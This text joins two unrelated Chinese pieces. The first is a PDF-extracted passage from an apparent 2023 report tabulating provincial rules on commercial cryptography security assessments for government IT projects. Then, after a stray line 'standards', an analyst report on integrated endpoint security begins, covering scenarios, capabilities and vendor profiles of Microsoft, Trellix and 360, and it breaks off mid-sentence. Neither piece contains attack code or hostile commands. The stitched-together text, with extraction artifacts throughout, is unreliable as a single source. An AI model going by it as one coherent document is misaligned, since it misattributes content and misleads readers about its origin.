目投资编制标准(试 行)》(琼数政〔 2022〕28 号) 第二章“建设类项目费用投资测算标准”第二节“项目建 设其他费”第七条“商用密码应用安全性评估费”中明确 提出:商用密码应用安全性评估费的定义、费用范围、计 取方法和标准等。 2021 年 3 月 《关于进一步明确省政 务信息化项目建设密码 应用有关要求的通知》 (琼国密局字〔2021〕 2 号) 第五条、第七条中提出:新建、改建、扩建以及通过政府 购买服务产生的政务信息化项目,项目建设单位在项目建 设完成后,应委托评估机构对信息系统进行密码应用安全 性评估。政务信息系统投入运行后,建设单位应按照密码 管理有关法规要求定期委托评估机构对系统开展密码应用 安全性评估,并根据安全需求、风险威胁程度、系统环境 变化以及对系统安全认识的深化持续改进密码保障措施。 2020 年 12 月 《海南省政务信息化项 目建设管理办法》(琼 府办〔2020〕38 号) 第二章“规划和审批管理”第八条中提出:省级各部门产 生的政务信息化项目,省大数据管理局应当按规定履行审 批程序并向省发展改革委备案。备案文件应当包括项目名 称、建设单位、审批部门、绩效目标及绩效指标、投资额度、 运行维护经费、经费渠道、信息资源目录、信息共享开放、 应用系统、等级保护或者分级保护备案情况、密码应用方 案和密码应用安全性评估报告等内容,其中改建、扩建项 目还需提交前期项目第三方后评价报告。 重庆市 2022 年 2 月 《关于规范重庆市市级 政务信息化项目密码应 用有关要求的通知》(渝 密局〔2022〕1 号) 进一步明确市级政务化项目各阶段密码应用要求:项目规 划阶段应按照相关标准编制密码应用方案,并对方案进行 评审;项目建设阶段应严格按照通过评审的方案进行建设, 建设完成后委托商用密码应用安全性评估机构进行评估, 在商用密码应用安全性评估报告出具 30 日内报市密码局备 案;项目运行阶段应开展定期评估、应急评估,统筹做好 密码保障系统改造工作。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 重庆市 2021 年 11 月 《重庆市市级政务信息 化项目管理办法》(渝 府办发〔2021〕122 号) 第四章“监督管理”第三十五条中提出:市级各部门应当 严格遵守有关保密等法律法规规定, 构建全方位、多层次、 一致性的防护体系,按要求采用密码技术,并定期开展密 码应用安全性评估,确保政务信息系统运行安全和政务数 据资源共享交换的数据安全。 2021 年 2 月 《关于印发重庆市工业 信息安全管理实施办法 (试行)的通知》 第九条提出:主体企业负有本单位工业信息安全的主体责 任,应结合实际做好本单位工业信息安全防护,建立健全 工业信息安全责任制,负责本单位工业信息安全保障和应 急管理工作,落实人、财、物保障。主体企业负责依法落 实网络安全等级保护制度,开展定级备案、等级测评、商 用密码应用安全性评估和安全建设整改等工作。 四川省 2023 年 2 月 《关于委托开展商用密 码应用安全性评估结果 备案相关工作的通知》 (川密局〔2023〕4 号) 各市(州)密码管理局受省密码管理局委托,负责本地区 密评结果备案的初审转报工作。驻川机构、省直部门以及 中央、省属企事业单位规划建设的信息系统可直接报省密 码管理局备案。 2022 年 10 月 《四川省省级政务信息 化项目密码应用与安全 性评估工作指南》(川 密局〔2022〕18 号) 对四川省省级政务信息化项目在规划阶段、建设阶段、运 行阶段的密码应用和密评工作要求作出具体安排,用以指 导各建设单位开展工作。 2022 年 4 月 《四川省一体化政务服 务平台电子证照管理暂 行办法》(川办规〔 2022〕3 号) 第五章“电子印章信息安全”第二十二条中提出:电子证 照系统建设单位按照“谁建设、谁负责”的原则,落实网 络安全等级保护制度和国家密码应用相关要求。电子证照 系统建设单位应充分利用密码技术、生物特征技术以及其 他必要的安全技术手段,加强证照申请人、持证主体身份 认证,确保身份真实可信。 2022 年 4 月 《四川省一体化政务服 务平台电子印章管理暂 行办法》(川办规〔 2022〕3 号) 第一章“总则”第六条中提出:省一体化平台电子印章系 统应当符合国家有关密码标准规范,应当通过国家密码管 理部门认可的商用密码应用安全性评估。 2021 年 10 月 《四川省省级政务信息 化项目管理办法》(川 办发〔2021〕49 号) 第四章“建设和运维管理”第三十一条中提出:建设项目 由省发展改革委组织竣工验收,验收资料包括密码应用安 全性评估报告等材料。 第八章“安全管理”第四十九条中提出:省密码管理局应 依法加强对政务信息系统密码应用的安全监管,指导监督 项目单位规范密码应用和管理。 第八章“安全管理”第五十一条中提出:项目不符合密码 应用和网络安全要求,或者存在重大安全隐患的,不安排 运行维护经费,项目单位不得新建、改建、扩建政务信息 系统。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 四川省 2021 年 9 月 《四川省“十四五”数 字政府建设规划》(川 府发〔2021〕24 号) 第四章“夯实数字政府建设基础”第五节中提出:落实关 键信息基础设施保护制度和网络安全等级保护制度,建立 重大项目网络安全风险评估机制,加强密码应用安全性评 估工作。 建设密码技术支撑平台,规范、完善和深化密码在政务云 平台等政务服务系统的应用。 提升密码产品检测和系统分析能力,完善密码应用安全性 评估审查机制,构建自主可控的密码认证测评体系。 推进基础设施网络密码应用,强化密码在信息惠民及社会 治理中的应用,提升关键信息基础设施密码保障能力。 贵州省 2023 年 3 月 《关于进一步规范商用 密码应用安全性评估试 点工作的通知》 指导各市州密码管理部门进一步强化职责,严格监管指导 密评试点工作用户单位、密评机构,规范密评结果备案材 料形式审查制度,建立完善密评结果备案材料复核制度, 推动密评结果客观真实。 2023 年 1 月 《贵州省省级政务信息 系统建设管理办法》 明确对省级政务信息系统密码应用“三同步一评估”作出 明确要求,省大数据局组织相关部门,对项目建设单位报 送的年度服务方案在相关政策符合性、可行性、软件架构 及业务功能、数据资源建设与管理、密码运用、硬件部署 方案、云资源占用合理性及投资概算等方面进行评审。 2022 年 1 月 《关于做好商用密码应 用安全性评估结果备案 工作的通知》 指导全省省直单位、中央在黔、人民团体等单位严格按照“三 同步一评估”要求推进商用密码应用,规范开展商用密码 应用安全性评估结果备案工作。 指导各市州密码管理部门依照分级管理要求,做好商用密 码应用安全性评估结果备案管理工作,按时报送当地密评 备案信息,指导督促本地网络与信息系统运营者按照“三 同步一评估”要求,推进商用密码应用。 云南省 2022 年 5 月 《云南省“十四五”电 子政务发展规划》(云 政办发〔2022〕37 号) 第五章“筑牢立体化安全运维和标准规范体系”第一节“强 化稳健可控的安全与运维保障体系”中提出:推进国产密 码应用,加强国产密码基础设施集约化建设和供给。推动 关键基础设施保护、等级保护、分级保护、密码应用评估 等信息安全测评工作常态化。 2022 年 4 月 《“十四五”数字云 南规划》(云政发〔 2022〕26 号) 第八章“营造健康安全数字生态”第二节“健全网络信息 安全体系”中提出:健全网络安全防护体系。落实信息系 统安全等级保护、涉密信息系统分级保护及风险评估制度, 定期开展网络安全专项督查与评估。规范、完善和深化国 产密码应用,提升密码基础支撑能力、建立健全密码应用 安全性评估审查制度。 2022 年 4 月 《云南省“十四五”新 型基础设施建设规划》 (云政发〔2022〕28 号) 第六章“促进新型基础设施开放与安全”第二节“提升安 全保障水平”中提出:规范密码应用和管理,促进密码事 业发展,保障网络与信息安全。支持开展网络安全技术和 产品研发。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 西藏自治区 2022 年 7 月 《西藏自治区非涉密政 务信息系统商用密码应 用与安全性评估工作指 南 ( 试行 )》(藏密局发 〔2022〕3 号) 该文件用于指导和规范西藏自治区非涉密政务信息系统商 用密码应用与安全性评估工作,明确了商用密码方案编制 及评审、信息系统商用密码应用安全性评估、商用密码应 用安全性评估备案等业务流程和管理要求。 2022 年 4 月 《西藏自治区政务信息 化项目建设管理办法》 (藏政办发〔2022〕14 号) 第三章“建设和资金管理”第十五条中提出:项目建设单 位应当落实国家密码管理有关法规和标准规范的要求,同 步规划、同步建设、同步运行密码保障系统并定期进行评估。 2021 年 12 月 《关于规范商用密码应 用安全性评估结果备案 工作的通知》(藏密局 发〔2021〕4 号) 该文件提出商用密码应用安全性评估结果备案的具体要求。 陕西省 2023 年 2 月 《关于征求陕西省数字 政府建设 2023 年工作 要点(征求意见稿)》 第四章“全面筑牢网络安全的坚固防线”第十五条“完善 安全管理制度规范”中提出:完善省级数字政府网络安全 制度规范体系,制定……密码应用等相关安全测评。 2022 年 9 月 《陕西省省级政务信息 化建设专项资金管理办 法》 进一步加强省级政务信息化建设专项资金管理,将密码应 用安全性评估经费纳入项目申报预算…确保专项资金安全 运行、专款专用。 2022 年 6 月 《陕西省省级政务信息 化项目建设管理办法 (暂行)》(陕政办发 〔2022〕19 号) 第一章“总则”第三条中提出:省委网信办、省公安厅、 省国家保密局、省国家密码管理局、省审计厅等按照职责 分工,负责项目网络安全监管、等级保护、分级保护、密 码评估、审计监督等相关工作。 2021 年 10 月 《陕西省人民政府办公 厅关于印发数字政府建 设“十四五”规划的通 知》陕政办发〔2021〕 27 号 第三章“主要任务”第三节“三大运行保障”中提出:加 强政务数据全生命周期管理,制定完善政务数据安全管理 总则和数据分类分级、共享开放、使用销毁等管理制度。 落实等级保护、商用密码应用安全性评估等合规性要求。 甘肃省 2022 年 4 月 《甘肃省人民政府办公 厅关于加快推进电子证 照扩大应用领域和互通 互认的通知》(甘政办 发〔2022〕50 号) 第二章“全面落实工作任务”第十条中提出:强化电子证 照安全管理。各地各部门要做好电子证照系统日常运行维 护,定期开展网络安全等级保护测评、密码应用安全性评 估等工作。 2021 年 12 月 《甘肃省数字政府建设 总体规划(2021-2025)》 (甘政办发〔2021〕113 号) 第四章“主要任务”第五节“推进体系建设,完善数字政 府运行新机制”第二条“构建可管可信的安全保障体系” 中提出:落实安全技术手段支撑。逐步推进安全技术手段 建设,同步规划、同步建设、同步运行密码保障系统并定 期进行评估,形成覆盖政务云、网、大数据基座、政务业 务应用的安全保障技术支撑能力。 2021 年 9 月 《甘肃省“十四五”数 字经济创新发展规划》 ( 甘政办发〔2021〕88 号) 保障数据安全。落实等级保护、密码应用、安全测评、密 码测评、电子认证、应急管理等基础制度。 中国密码学会密评联委会 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 青海省 2020 年 5 月 《关于印发青海省省级 政务信息化项目建设管 理办法的通知》(青政 办〔2020〕38 号) 第三章“建设和资金管理”第十八条中提出:项目建设单 位应当落实国家网络安全和密码管理有关法律法规和标准 规范的要求,同步规划 、同步建设 、同步运行网络安全和 密码保障系统并定期进行评估。 第四章“监督管理”第三十三条中提出:各部门应当严格 遵守有关保密等法律法规规定,构建全方位 、多层次 、一 致性的防护体系,按要求采用密码技术,并定期开展密码 应用安全性评估,确保政务信息系统运行安全和政务信息 资源共享交换的数据安全。 宁夏回族自 治区 2023 年 1 月 《关于进一步规范全区 商用密码应用安全性评 估工作的通知》 进一步强化密评主体责任,加强对密评实施活动的监督, 规范密评结果备案工作,严格开展形式审查,鼓励商密协 会发挥作用,加强行业自律,促进行业健康发展。 2022 年 5 月 《关于进一步规范全区 政务信息化项目商用密 码应用和安全性评估的 通知》(宁密局发〔 2022〕1 号) 项目建设单位应落实国家密码管理有关法律法规和标准规 范的要求, 使用商用密码进行保护, 同步规划、同步建设、 同步运行密码保障系统并定期开展密码应用安全性评估。 在项目规划阶段,应制定密码应用方案,并委托评估机构 对方案开展密码应用安全性评估。未通过密评的密码应用 方案,不得作为密码保障系统的建设依据;项目建设完成后, 应委托评估机构开展密码应用安全性评估。信息系统投入 运行后,项目建设单位应委托评估机构每年对系统开展密 码应用安全性评估,确保密码保障系统正确有效运行。关 键信息基础设施和网络安全等级保护第三级系统应在 2022 年底前完成,未完善密码保障系统并通过评估的,第二年 起不予安排运维经费,并暂停安排除密码保障系统建设完 善之外的信息化项目。 2021 年 12 月 《关于规范我区商用密 码应用安全性评估结果 备案工作的通知》(宁 密局发〔2021〕1 号) 网络与信息系统密评备案主体应为各地区各部门网络与信 息系统运营者,各责任单位务必高度重视,认真履行密码 安全主体责任,明确密码安全负责人,按要求开展密评、 备案和密码应用整改,配合密码管理部门和有关部门的安 全检查。 2021 年 8 月 《宁夏电子政务建设 十四五规划意见》 1 )严格落实密码应用安全性评估制度,强化全网、全域、 全业务的电子政务综合安全防护。 2 )升级优化电子政务信 息服务体系,为电子政务资源安全利用和行为可信提供安 全支持保障。3)完善电子政务密码保障体系,促进电子政 务公共云平台密码服务能力建设,为云上应用提供集约化 密码服务,实现密码在电子政务系统中的有效应用。 商用密码应 2023 省 ( 自治区、 直辖市 )、 新疆生产建 设兵团 发布时间 政策文件 相关内容 宁夏回族自 治区 2021 年 6 月 《宁夏回族自治区贯彻 落实网络安全等级保护 制度和关键信息基础设 施安全保护制度的实施 意见》(宁公(网安) 通〔2021〕42 号) 网络运营者要认真贯彻落实《中华人民共和国密码法》等 有关法律法规规定和密码应用相关标准规范。新建第三级 (含)以上网络,运营者要按照“三同步”的要求正确、 有效采用密码技术对网络系统进行保护,并使用符合相关 法律法规规定的密码产品和服务,已运行的第三级(含) 以上网络运营者要尽快按要求进行整改。第三级(含)以 上网络运营者要在网络规划、建设阶段同步规划密码防护 措施,在网络安全等级测评中同步开展密码应用安全性评 估,正式运行后,每年至少评估一次。评估完成后,应在 30 个工作日内将评估结果报所在地密码管理部门、公安部 门备案。 新疆维吾尔 自治区 2023 年 2 月 《新疆维吾尔自治区密 码管理局关于进一步规 范自治区商用密码应用 建设和安全性评估工作 的通知》(新机发明电 〔2023〕1 号) 第二章“规范开展密码应用安全性评估”中提出:“明确范围。 网络安全等级保护三级以上的网络和信息系统应开展商用 密码应用安全性评估。其中采取租赁云平台部署的信息系 统(如门户网站等)应独立可进行评估;采取组网或终端 方式接入上级部门建设的重要信息系统的,若具备本地接 入用户、系统运维管理等实质全线,或在本地进行系统数 据汇集、系统分中心部署等实质控制行为,应独立进行评 估。”“确保客观。各地各部门应采取直接委托具备资质 的第三方测评机构开展商用密码应用安全性评估,不得委 托信息系统集成商全权代理,不得干扰第三方测评机构独 立自主开展工作,不得影响干预评估结果。” 2023 年 2 月 《新疆维吾尔自治区公 共数据管理办法(试 行)》(新政办发〔 2023〕11 号) 第七章“监督保障”第三十八条中提出:公共数据提供部 门、公共数据使用部门、平台建设运维管理部门应遵循“谁 提供、谁负责, 谁使用、谁负责, 谁流转、谁负责”的原则, 按照国家信息安全等级保护、数据分类分级管理、密码应 用安全保护要求,在公共数据资源共享开放全过程中加强 安全传输、访问控制、授权管理、全流程审计等方面的安 全管理和防护。 2021 年 2 月 《新疆维吾尔自治区密 码管理局关于深入贯彻 密码法进一步健全完善 自治区密码应用和管理 工作机制的指导意见》 (新密局〔2021〕4 号) 第二节“建立完善密码应用工作报告机制”中提出:“责 任单位要将密码应用管理工作纳入项目建设各关键环节。 规划阶段:责任单位应依据密码应用有关标准,制定商用 密码应用建设方案,组织专家或委托测评机构进行评估论 证,论证结果作为必要条件列入项目立项材料并报本级密 码管理部门备案。建设阶段:责任单位应当委托第三方测 评机构进行商用密码应用安全性评估,评估结果作为项目 验收重要依据并报本级密码管理部门备案。运行阶段:定 期开展商用密码应用安全性评估,评估报告报本级密码管 理部门备案。 第四节“建设完善密码应用联合审查机制”中提出:“4. 项 目验收阶段,密码应用安全性评估报告是项目验收的必要 条件。对于不符合密码应用和网络安全防护要求,或者存 在重大安全隐患的政务信息系统,不安排运行维护经费, 项目建设单位不得新建、改建、扩建信息系统。”
standards
前 言 数字化转型带来的数字办公,意味着越来越多的工作是在数字化环境中完 成。而端点则是数字化环境中,负责进行人机交互,以及信息处理、存储的重 要环节。因此,端点始终是攻击者的主要目标之一,端点依然是企业必然要防 护的对象。 端点面临的风险数量很多,包括资产不清晰、勒索攻击、漏洞利用、违规 远程接入、敏感文件、数据的泄露和未知威胁攻击等等。近几年,在各级别各 行业实网攻防演练的带动下,国内的终端安全需求有两个新变化: 一是终端侧 面对的威胁等级在提高, 0day 漏洞、无文件攻击等高级攻击手段开始频繁出现; 二是终端侧面对的攻击手段越来越多样, 除勒索病毒、钓鱼邮件外, 身份仿冒、 大规模鱼叉式攻击、U 盘诱骗、社工攻击等让一线终端用户防不胜防。 终端安全多样化威胁场景, 需要 的则是一体化终端安全能力 ,我们称之为 All in One 的能力。 为什么需要 All in One,我们以终端上的 agent 来举例。传统各类终端 安全产品,如终端管理软件、防病毒软件、EDR、终端 DLP…… 每个单点安全 能力都有各自的 agent 要安装,这对于有经验的安全管理员来说,尚且头疼, 对于不太熟悉电脑操作的用户,还可能“无意中”安装各类终端优化软件,结 果是优化不成,终端反而成为 agent 们互相斗法的战场,尤其是当这些产品来 自于不同供应商的时候,不仅难以协同对端点进行防护,甚至当端点出现安全 事件的时候,各类产品反而容易引发端点系统的崩溃。这让一线普通用户和安 全管理员都苦不堪言。 对于大部分普通用户来说,都希望只要一个 agent,就覆盖绝大部分终端 安全需求。且多种安全能力只在用户需要的时候才下发使用, 做到“按需使用, 随用随取” 。 用户需求是明确的,但实现起来并不容易。“少就是多”的难度不在于单 点能力的实现,而在于如何将这些能力有机融合,按需提供。即 以 All in One 的思路 ,将多样化 的终端安全 需求( 如终端管理 、防病毒 、E DR 、终端 D LP、 身份安全等 )融合在单一终端安全产 品 中, 以极简交付方式, 为用户提供一体 化的终端安全能力 。可以说,一体化的端点安全防护解决方案则会成为未来的 主要方向。 鉴于上述背景,数世咨询撰写本报告。 * 勘误及交流请联系本报告主笔分析师刘宸宇:liuchenyu@dwcon.cn 关键发现 ● 企业需要及 时掌握各环境场景 中各类端点的漏洞情况 ,才能更为全面地 了解 自身端点的攻击暴露面。 ● 数据的价值在于流动 ,流动过程 中的最重要节点就是端点。 ● “一体化 ”不仅指将多类型的终端通过一个平台进行管理, 同 时也意味 着将端点面临的各类威胁通过一个平台进行管理和响应。 ● 一体化端点安全将端点侧存在的多种风险在数据层面拉通 ,才能更高效 看见风险,有效进行统一分析、统一管理,从而实现统一视角下的智能化响应。 ● 防病毒一方面需要迭代演进 ,满足勒索病毒频发 、信创环境普及等新形 势 ,另一方面需要将病毒沙箱等能力点开放输 出。 ● 一体化端点安全在端点侧应当具备更广泛的威胁发现能力—— 除防病毒 以外,端点上的异常行为 、恶意软件、数据泄露等都应覆盖。 ● 一体化端点安全具有多样化需求 、多场景应用 、多维度能力, 因此需要 在产品操作易用性上重点关注 ,不能将“使用成本 ”简单堆叠后转嫁给用户。 ● 未来一段 时 间 ,行业用户 自身在一体化端点安全的落地上会存在一定的 犹豫。 ● 一体化端点安全的端点覆盖范 围将进一步向泛终端扩展。 ● 短 时 间 内快速提升信创操作系统及信创应用的整体风险管理水平 ,最具 性价 比 的方式就是从一体化端点安全入手 ,通过一体化管理平台 同 时从“终端 管理 ”与“终端安全 ”两个主要维度降低信创 国产化替代过程 中伴随的安全风险。 第一章 一体化端点安全典型场景 1.1 基于安全合规的终端管理 端点侧的合规是大部分企业用户的第一需求。近年来,网络安全法律法规相继 完善,行业区域监管愈加严格,企业用户愈发重视机构内大量端点的安全合规,尤 其是对包括安全管理、终端准入等在内的端点安全合规一体化管理。因此用户需要 一个一体化平台,对环境内大量端点的相关安全配置进行监控与管理,确保端点的 安全基线,避免因不合规带来的安全风险。 1.2 防病毒与防恶意软件 病毒与恶意软件是端点面临的最直接风险。尽管产业已发展多年,防病毒与防 恶意软件能力依然是一体化端点安全扎实必备的基础能力。加之国内许多企业机构 因为各种原因,仍存在纯封闭的内网环境,因此从全球范围来看,结合云端情报能 力的反病毒分析是大势所趋,但以病毒库特征匹配为基本模式的病毒查杀能力与防 恶意软件能力始终必不可少。 1.3 端点漏洞管理 端点上的漏洞对企业而言是另一个巨大隐患。口罩三年加速了远程办公的普及, 端点类型多样化的趋势突显, 企业需要及时掌握各环境场景中各类端点的漏洞情况, 才能更为全面地了解自身端点的攻击暴露面。针对这些端点漏洞风险,企业需要结 合业务、区域等相关优先级,对端点漏洞采取响应措施,包括对端点系统实施升级 策略以及使用虚拟补丁等。这是一体化端点安全应对漏洞时的典型场景。 1.4 威胁检测与响应 端点远离安全团队的覆盖触角,天然具有被优先突破的脆弱性,因此在实网攻 防演练等场景中,蓝队攻击者大多将端点作为首选攻击入口——比如大量的钓鱼邮 件攻击, 在野0.5day/1day 漏洞攻击等。防守团队就需要第一时间在端点侧发现威胁, 横向阻断,同时将该威胁情报迅速同步至所有终端,这即是典型的 EDR 终端威胁检 测与响应场景,也是一体化端点安全能力当中不可或缺的能力之一。 1.5 端点数据安全 数据的价值在于流动,流动过程中的最重要节点就是端点。居家办公、远程办 公普及后,企业机构的各类数据——特别是大量的非结构化数据——都会在终端由 用户读取、修改、写入。因此,在数据的远程访问与终端处理过程中,如何从端点 侧应对数据泄露的风险,这是一体化端点安全要面对的另一个主要场景。 第二章 一体化端点安全概念概述 2.1 一体化端点安全定义 本 报 告 中, 数 世 咨 询 对 一 体 化 端 点 安 全(Integrated Endpoint Security)描述如下: 以统一管理平台与单一 agent 为终端 PC 及其他多种端点类型 (如服务器、 智能设备 / 移动设备、IoT 终端等)提供一体化 的安全解决方案 。一体化能力 应当包括但不限于:终端管理、安全准入、防勒索、AV/EPP、漏洞管理、终端 数据防泄漏、威胁检测与响应等。 2.2 一体化端点安全能力框架 图 1 一体化端点安全能力框架 2.3 一体化端点安全概念说明 首先,本报告中的“一体化端点安全”主要指覆盖传统 PC 或者桌面办公 场景下的端点安全解决方案。终端类型主要集中在 Windows、Linux、macOS 以 及信创操作系统等终端类型。 对于主机服务器场景,其安全需求与技术环境和传统的 PC 端都有非常大 的区别,例如极高的业务连续性要求、更高的应急响应时效要求,以及极少的 自动化响应需求。因此主机侧的安全解决方案,相比之下笔者推荐更有针对性 的 HDR 主机检测与响应。 当然,在调研过程中我们也发现,尽管 PC 侧与主机侧的环境差异巨大, 依然会有部分企业希望能够通过一个平台实现对 PC 和主机等各类端点的管控。 另一方面随着远程办公的兴起,移动终端、智能终端的安全需求也不容忽视。 因此,对于当前一体化端点安全的覆盖范围,本报告定义为至少要包含 PC 与 桌面端,然后向智能设备、移动设备,以及主机侧延伸。 此外要着重说明的是,报告中的 “一体化”不仅指将多类型的终端通过 一个平台进行管理,同时也意味着将端点面临的各类威胁通过一个平台进行管 理和响应。 由于端点安全的产品不断有新的理念、产品形态出现,因此将一体化端点 安全认为是端点安全产品的简单堆叠是欠妥的,缺乏发展视角的;而最终目的 是对终端侧的威胁风险进行一体化应对和处置,这与数世咨询提出的“威胁检 测与响应(TDR) ”也是呼应的。所以, “一体化”并非是指端点安全产品的 堆叠一体化,而是指应对端点风险和威胁的安全能力的一体化。 第三章 一体化端点安全主要能力 如前所述, 一体化端点安全并非简单地将各个端点安全产品进行堆砌,而 是对端点进行统一的安全管理和防护,这就要求一体化端点安全能力首先对端 点上多种类型的攻击事件以及安全风险都能够检出与告警,在此基础上,再将 端点侧存在的多种风险在数据层面拉通,从而有效看清端点资产台账,看见潜 在风险威胁,最终通过高易用性的统一管理平台,进行统一分析、统一管理, 从而实现统一视角下的智能化响应。 3.1 基于安全的终端管理 相比传统终端安全管理平台日志割裂,联动能力匮乏的问题,基于安全的 终端管理可以在端点资产管理、安全配置管理、漏洞管理等多维度统一管控的 基础上,实现后续端点资产的病毒防护、安全接入、威胁检测与响应以及数据 安全防泄漏等能力。 这里终端管理以攻击面视角, 根据不同的工作负载类型(物理 PC、桌面云、 物理主机、虚拟主机、容器),对端点资产可能存在的各类风险进行提示和修 复,赋予其更有针对性的检测防护能力,如可疑资产接入、弱密码等端点的风 险配置、已知漏洞等。相当于基于安全视角为后续各安全能力提前梳理了潜在 的攻击暴露面,全盘掌控全局不同端点类型安全管理状况。 值得一提的是,针对操作系统老旧版本的终端,例如 Window7 和 IE 浏览 器环境,终端管理应当重点提供漏洞管理、系统加固等功能。 3.2 防病毒 防病毒是最主要的传统安全能力,但传统不代表不重要。作为一体化端点 安全能力中最基础的一项能力,防病毒一方面需要迭代演进,满足勒索病毒频 发、信创环境普及等新形势,另一方面需要将病毒沙箱等能力点开放输出,与 诸如 NDR、TIP 等流量与情报侧的产品联动,提升针对“黑名单”类威胁的检 测与响应能力。 根据不同行业用户的不同网络环境,防病毒查杀引擎应当采用本地多引擎 部署、或是云端查杀引擎联合部署等不同方式。 3.3 威胁检测与响应 一体化端点安全在端点侧应当具备更广泛的威胁发现能力——除防病毒以 外,端点上的异常行为、恶意软件、数据泄露等都应覆盖。针对威胁做出的响 应, 应当以“单点封禁、横向阻断”为原则, 对失陷终端与其他终端联动处置。 例如结束失陷终端上的恶意进程,隔离进程文件,同时横向对所有潜在受到威 胁的终端封禁恶意 IP 和域名,遏制进一步受影响的范围。 为提高响应时效, 针对单个端点的部分操作如病毒查杀、单点封禁等动作, 可以以自动化方式完成;对于需要安全分析人员参与的部分,可由统一管理平 台对相关事件日志、操作日志留存、汇总并可视化呈现,供有条件的团队进一 步对威胁事件进行复现与溯源等操作。 3.4 终端类型与数量 一体化端点安全要覆盖主流操作系统如 Windows(包含 PC 与 Server 版)、 Linux、macOS,以及统信、麒麟等信创操作系统;所支持的终端数量一般单机 数万,并支持级联扩展;部署方式要同时兼顾互联网开放环境与具有保密要求 的隔离网环境,特别是对于病毒防护场景,要具备离线升级病毒库的能力。 各类终端上的 agent 要具备兼顾业务稳定性的“适时防护逻辑”,即一体 化端点防护平台能够能力化输出给客户具体业务系统,可以做到按需启动,忙 时不占用客户资源,闲时可实时启动,在保证业务稳定运行的前提下,最大限 度保障业务安全。 3.5 操作易用性 端点类安全产品普遍存在着不同程度的操作繁琐、上手成本高等问题,相 比满足单点需求的产品或工具, 一体化端点安全更具有多样化需求、多场景应 用、多维度能力,因此需要在操作易用性上重点关注与投入,提供符合端点安 全运营管理者及终端用户心智的人机交互界面,切不可将功能简单堆叠后,把 复杂留给用户,这将直接带来高使用门槛和低安全运营效率。 首先架构上要以统一平台管理为基础,其次对用户侧的功能操作流程、页 面信息结构均要有针对性地提炼,以提升关键信息传递效率及功能易学易用性。 例如针对常用典型场景划分功能模块、单模块下的操作要简单且闭环、结果的 可视化要优先呈现重要或结论性数据等等。总之, 一体化端点安全在提高安全 效率的同时,应当以简化管理为同等标准与目标。 第四章 一体化端点安全代表企业 4.1 微软 2020 年,微软凭借超过 100 亿美元的安全业务收入,走到台前一跃成为 实质上的全球第一大安全厂商。其安全能力来源于强大的整合能力和超强的 AI 自动化能力,整合能力是因为微软在操作系统、智能设备、软件应用、人 工智能、云和网络安全等多个技术领域, 均居世界顶尖之位。聚焦到安全方面, 身份与访问管理、端点安全、邮件安全、应用安全、数据防泄露、SIEM 和云 安全,真正实现了端到端的安全。 结合本报告,微软的上述安全能力在其 Defender 产品中均有所体现, 我们从微软官方发布的 Microsoft Cybersecurity Reference Architecture (MCRA)中可以看到。 如上图所示, 在端点与设备侧(Endpoint & Devices), 其能力在具备 “统一端点管理”的基础上,同时对 Android、macOS、Windows 等多类型终端, 覆盖了 EDR、Web 内容过滤、威胁与漏洞管理、终端 DLP 等能力,这些安全 能力一方面依托于 Windows OS(2021 年发布时为 Windows10 操作系统)的原 生安全能力,同时也依托于微软来自物联网终端、云端、以及 GitHub 社区等 层面强大的威胁情报能力。同时微软也会从身份安全(Securing Privileged Access )与安全分值评估与建议(Microsoft Secure Score)两方面提供支持。 如上图所示, 具体在终端侧, 依托 Microsoft 365 Defender, 微软提供 了漏洞管理、攻击面收敛、下一代安全防护、EDR、自动化调查与整改、威胁 专家服务等多样化能力,这些能力都是通过 API 接口与一体化平台对接后进行 统一配置与统一管理的。 对于用户来说,上述能力已经能够覆盖大部分端点侧的安全需求,且对于 微软来说,上述安全能力可以通过操作系统为用户原生交付,大大提升了交付 效率、使用效果与用户体验。 当然,在目前的国际大背景下,这对于国内用户来说恰恰成为一个现实问 题。一方面信创国产化替代等合规要求, 使微软在国内行业用户侧已不再适用; 另一方面,普通用户侧不少终端还在使用 Windows 7(甚至 Windows XP)操作 系统,不具备原生交付安全能力的条件,甚至连最基本的漏洞补丁升级服务也 难以得到保障。 即便如此,从全球范围来看,微软在终端侧的一体化端点安全能力,在数 世咨询看来,依然是值得重点考虑的厂商之一。 4.2 Trellix 2021 年 底,McAfee 与 FireEye 合 并,2022 年 初, 新 公 司 命 名 为 Trellix。强强联合带来的优势能力互补整合,使得 Trellix 的端点安全解决 方案以强大防病毒能力为基础的同时, 兼具了以攻击面管理为视角的EDR 能力、 可视化管理能力。 具体来说,Trellix 端点安全产品一方面使用单个 agent 从多个层面自动 化收集威胁信息,消除多个产品造成的冗余,减少手动威胁关联的工作量与潜 在错误; 另一方面将进一步需要人工参与调查的威胁详细信息自动提交给事 件响应团队,并通过 Story Graph 页面以简单、 一目了然的格式呈现,方便 安全团队深入了解和调查恶意行为者的来源。 依托其端点安全产品, Trellix 打造了以攻击面管理、预防、检测、调查、 响应等 5 个阶段为闭环的端点安全解决方案,提供包括安全态势评分、配置管 理、漏洞利用暴露面、自动化策略更新、自动化威胁狩猎、原生系统管控、用 户行为管控、漏洞利用防护、无文件攻击防护、持续监测预警、优先级分析、 AI 引导的调查、ATT&CK 映射、主动行动情报、大规模实时响应等在内的安全 能力。 为了提升响应时效,方案还融合了 XDR 产品、MDR 服务,并开放 API 支持 与生态合作伙伴的应用进行对接。如下图所示: 总体而言,Trellix 的一体化端点安全解决方案更倾向于高级威胁的全面 端点防护,通过使用统一平台简化管理,用户能够在攻击发生之前,以攻击者 视角进行更加高效的风险管理。 同微软一样,Trellix 也会遇到信创国产化替代等现实问题。此外,在国 内用户多年来普遍接受的 McAfee 品牌更换为 Trellix 后,实现品牌价值延续 成为了一个新问题。 但不可否认的是,McAfee 与 FireEye 多年来的技术与产品积累,使其一 体化端点安全能力在业内仍然处于领先地位,这一点是毋庸置疑的。在 2022 年正式更名 Trellix 后,经过一年多的整合与“蛰伏“,今年 Trellix 已经开 始在国内多地举办小型活动,崭露头角。 4.3 360 数字安全 作为国内最早同时涉足操作系统优化与终端防病毒防护的厂商之一的 360,经过多年的持续投入与积累,目前其一体化端点安全能力以强大的终端 管理能力与防病毒能力为基础,同时具备了包括资产管理、威胁对抗、合规管 控、安全自助管理、安全接入、以及终端 DLP 